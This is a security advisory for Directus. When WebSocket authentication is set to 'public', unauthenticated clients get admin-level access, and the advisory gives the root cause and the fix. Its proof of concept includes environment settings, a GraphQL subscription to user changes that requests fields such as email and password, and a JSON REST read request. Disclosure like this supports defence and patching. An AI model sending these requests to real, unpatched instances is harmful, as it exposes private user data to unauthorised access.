GHSA-849r-qrwj-8rv4

### Summary
When setting `WEBSOCKETS_GRAPHQL_AUTH` or `WEBSOCKETS_REST_AUTH` to "public", an unauthenticated user is able to do any of the supported operations (CRUD, subscriptions) with full admin privileges.

### Details
Accountability for unauthenticated WebSocket requests is set to null, which used to be "public permissions" until the Permissions Policy update which now defaults that to system/admin level access. So instead of null we need to make use of `createDefaultAccountability()` to ensure public permissions are used for unauthenticated users.

### PoC
1. Start directus with
```bash
WEBSOCKETS_ENABLED=true
WEBSOCKETS_GRAPHQL_AUTH=public
WEBSOCKETS_REST_AUTH=public
```

2. Subscribe using GQL or REST or do any CRUD operation on a user created collection (system tables are not reachable with crud)
```gql
subscription {
directus_users_mutated {
key
event
data {
id
email
first_name
last_name
password
}
}
}
```
or
```json
{
"type": "items",
"action": "read",
"collection": "your_collection_name"
}
```
3a. Open up the data studio as any user. Observe how the subscriber gets notified on each page navigation (because the users `last_page` gets updated, the `password` fields is properly redacted here)

3b. Observe receiving all available items from the `your_collection_name` collection.

### Impact

This impacts any Directus instance that has either `WEBSOCKETS_GRAPHQL_AUTH` or `WEBSOCKETS_REST_AUTH` set to `public` allowing unauthenticated users to subscribe for changes on any collection or do REST CRUD operations on user defined collections ignoring permissions.